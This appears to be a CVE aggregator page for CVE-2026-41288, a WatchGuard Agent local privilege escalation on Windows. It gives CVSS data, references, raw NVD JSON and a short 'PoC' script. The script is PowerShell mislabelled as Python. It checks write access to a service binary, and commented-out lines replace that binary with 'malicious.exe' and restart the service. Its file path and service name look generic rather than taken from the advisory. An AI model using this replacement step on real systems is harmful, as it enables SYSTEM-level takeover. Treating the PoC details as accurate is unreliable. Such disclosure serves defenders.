CVE-2026-41288

Description

Incorrect permission assignment for a resource in the patch management component of the WatchGuard Agent on Windows allows an authenticated local user to elevate their privileges to NT AUTHORITY\\SYSTEM.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:* - VULNERABLE

请参考官方公告 WGSA-2026-00011

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-41288: WatchGuard Agent Local Privilege Escalation
# This script demonstrates checking for weak permissions on a service binary.

$TargetFile = "C:\Program Files\WatchGuard\WatchGuard Agent\patch_manager.exe"
$CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name

Write-Host "[*] Checking permissions for: $TargetFile"

try {
    $Acl = Get-Acl $TargetFile
    $AccessRules = $Acl.AccessToString
    
    # Check if 'Everyone' or current user has Write access
    if ($AccessRules -match "Write" -and ($AccessRules -match "Everyone" -or $AccessRules -match $CurrentUser)) {
        Write-Host "[+] Vulnerable! Write permissions detected."
        Write-Host "[*] An attacker could replace the binary to gain SYSTEM privileges."
        
        # Simulated exploitation (commented out)
        # Copy-Item "malicious.exe" -Destination $TargetFile -Force
        # Restart-Service -Name "WatchGuardPatchSvc"
    } else {
        Write-Host "[-] No obvious write permissions found for the current user."
    }
} catch {
    Write-Host "[-] Error accessing file: $_"
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41288
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41288
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41288/
[4] VulDB https://vuldb.com/cve/CVE-2026-41288
[5] https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00011

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41288", "sourceIdentifier": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "published": "2026-05-06T16:16:10.147", "lastModified": "2026-05-11T18:35:41.823", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect permission assignment for a resource in the patch management component of the WatchGuard Agent on Windows allows an authenticated local user to elevate their privileges to NT AUTHORITY\\\\SYSTEM."}], "metrics": {"cvssMetricV40": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:watchguard:agent:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.25.03.0000", "matchCriteriaId": "1D391721-7499-4701-A84D-C58CD093CCB0"}]}]}], "references": [{"url": "https://www.watchguard.com/wgrd-psirt/advisory/WGSA-2026-00011", "source": "5d1c2695-1a31-4499-88ae-e847036fd7e3", "tags": ["Not Applicable"]}]}}